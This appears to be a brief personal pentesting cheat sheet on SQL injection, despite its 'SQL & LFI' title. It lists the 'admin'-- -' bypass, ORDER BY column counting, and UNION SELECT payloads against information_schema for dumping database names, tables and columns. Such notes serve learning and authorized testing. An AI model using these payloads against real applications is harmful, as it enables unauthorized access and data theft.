SQL & LFI
if you find a SQL vuln in an application, try UNION injection
if the basic "admin'-- -" is possible, that means the query will look like
SELECT * FROM USERS WHERE FIRST_NAME = 'userinput'-- -'
so everything after WHERE is possible
In this example below, we've got ID, Name, Position, Phone No, and Email data
Try doing admin' UNION SELECT NULL,NULL,.... -- - to see any weird behaviors. (data breaking, byte changes) with burp
or do admin' ORDER BY 1, ORDER BY 2.....
If it breaks that means it can only handle the number before the error.
Now, we can extract useful data from the database!
try database()
Information_schema.tables
extract data from columns, tables
UNION SELECT SCHEMANAME,2,3,4,5,6 FROM information_schema.schemata -- -
if you can't extract multiple data at once, try
'UNION SELECT groupconcat(SCHEMANAME),2,3,4,5,6, FROM information_schema.schemata-- -
What tables are in user database?
Once we know table names, try to extract data from columns
displaying table and columns names
Last updated